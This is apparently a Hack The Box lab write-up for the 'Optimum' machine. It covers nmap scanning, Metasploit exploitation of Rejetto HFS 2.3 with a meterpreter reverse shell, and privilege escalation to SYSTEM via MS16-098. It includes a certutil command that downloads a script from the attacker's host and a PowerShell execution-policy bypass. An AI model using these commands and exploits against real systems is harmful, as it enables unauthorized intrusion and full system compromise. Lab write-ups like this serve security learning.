HTB 7. Optimum
nmap -A -T4 -p- 10.10.10.8reveals only port 80 runninghttpd 2.3- Going to
10.10.10.8shows its a file server - Search for default credentials (httpd has no default credentials)
searchsploit rejetto(since rejetto is the vender of this file server)- Search google for
rejetto hfs 2.3 exploitreveals metasploit remote code execution and many others - Nmap reveals probably an OS that the exploit works on
- Metasploit
use exploit/windows/http/rejetto_hfs_exec, set rhsots, and set payload towindows/x64/meterpreter/reverse_tcp set lhost tun0instead of typing in IP (because its faster)sysinfoshowsx64onx64andgetidiskostas- Attempt priv esc:
getsystemfails,backgroundanduse post/multi/recon/local_exploit_suggester(set session 1) andrunreveals nothing sherlockbyrastamouse(or more up-to-date versionWatson)- Search google for
windows 2002 r2 (build 9600) privilege escalationrevealsexploit-dbexploit avaible that might possibly work - Search
ms16-032in metasploit shows there is a module for it. Letsuseit. Set target to1which isx64. Setlhost tun0andlport 443. Ran twice; didn't work. - Manual method: Download
sherlockabove assher.ps1. Start http server with python and use cerutil (certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1) to download file. Run withpowershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}". Result: 3 Potential vulnerabilities - Clone AonCyberLabs/Windows-Exploit-Suggester, run
python ./windows-exploit-suggester.py --update - Run
systeminfoin shell on target and put in text file forwindows-exploit-suggester.py. - Run
python ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txtwhich detectsMS16-098exploit; download exploit fromexploit-db. gcc 41020.c ex.exefails so lets download the binary from the link provided onexploit-db.- Run python web server, download to target, and run with
sh.exe. whoamigives usnt authority\system